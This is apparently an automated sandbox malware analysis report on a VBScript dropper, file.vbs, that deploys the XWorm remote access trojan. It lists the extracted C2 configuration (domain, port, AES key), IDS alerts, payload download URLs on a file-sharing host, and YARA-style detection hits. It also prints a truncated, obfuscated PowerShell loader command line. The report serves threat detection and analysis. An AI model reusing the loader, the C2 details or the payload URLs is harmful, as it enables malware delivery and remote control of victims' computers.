Windows Analysis Report
file.vbs

AV Detection

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: xwormmom53.duckdns.org	Avira URL Cloud: Label: malware

Source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["xwormmom53.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Source: file.vbs

ReversingLabs: Detection: 28%

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Compliance

Source: unknown	HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.8:49711 version: TLS 1.2

Source:	Binary string: CallSite.Targetore.pdbj source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: a`ystem.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1959428838.0000000008919000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBD9F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagement.Automation.pdb source: powershell.exe, 00000002.00000002.2155969999.0000016CBD76C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Core.pdbD source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRT-P source: powershell.exe, 00000008.00000002.1954692113.0000000007811000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49713 -> 57.128.155.22:8896
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8896 -> 192.168.2.8:49713
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.8:49713 -> 57.128.155.22:8896
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8896 -> 192.168.2.8:49713

Source: Malware configuration extractor

URLs: xwormmom53.duckdns.org

Source: unknown

DNS query: name: xwormmom53.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.8:49713 -> 57.128.155.22:8896

Source: global traffic	HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1Host: www.sendspace.com
Source: global traffic	HTTP traffic detected: GET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1Host: fs03n5.sendspace.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 57.128.155.22 57.128.155.22
Source: Joe Sandbox View	IP Address: 69.31.136.17 69.31.136.17
Source: Joe Sandbox View	IP Address: 69.31.136.57 69.31.136.57

Source: Joe Sandbox View

ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pro/dl/8gikly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n3.sendspace.comConnection: Keep-AliveCookie: SID=7cbl3ctvlcko76s2guour4vig6

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1Host: www.sendspace.com
Source: global traffic	HTTP traffic detected: GET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1Host: fs03n5.sendspace.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pro/dl/8gikly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n3.sendspace.comConnection: Keep-AliveCookie: SID=7cbl3ctvlcko76s2guour4vig6

Source: global traffic	DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic	DNS traffic detected: DNS query: fs03n3.sendspace.com
Source: global traffic	DNS traffic detected: DNS query: fs03n5.sendspace.com
Source: global traffic	DNS traffic detected: DNS query: fs13n3.sendspace.com
Source: global traffic	DNS traffic detected: DNS query: xwormmom53.duckdns.org

Source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA75A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fs03n3.sendspace.com
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fs03n5.sendspace.com
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fs03n3.sendspaX
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fs03n3.sendspace.com
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5893000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpb
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fs03n5.sendspace.com
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/
Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672655270.0000000006DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/Di
Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/_i
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC1
Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/eh
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs13n3.sendspace.com/om:443
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA60F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA74FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com/
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com/FW
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672384131.0000000006CE0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com/pro/dl/8gikly
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com/pro/dl/8giklyM
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com/pro/dl/ppxodmP
Source: powershell.exe, 00000008.00000002.1946860119.0000000004FE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sendspace.com/pro/dl/ppxodmXR

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.8:49711 version: TLS 1.2

System Summary

Source: amsi64_7772.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5824.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7248
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7248			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7248			Jump to behavior

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B1DC856		2_2_00007FFB4B1DC856
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B1DD602		2_2_00007FFB4B1DD602
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B1D4CFA		2_2_00007FFB4B1D4CFA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2255D908		11_2_2255D908
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_22550EC0		11_2_22550EC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2255D504		11_2_2255D504
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F66230		11_2_24F66230
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F61198		11_2_24F61198
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_24F65270		11_2_24F65270

Source: file.vbs

Initial sample: Strings found which are bigger than 50

Source: amsi64_7772.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5824.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@12/7@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Blanko.Pro

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\EXwKoBFFWMorKcFJ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgxgobk3.rwg.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7772
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5824

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.vbs

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
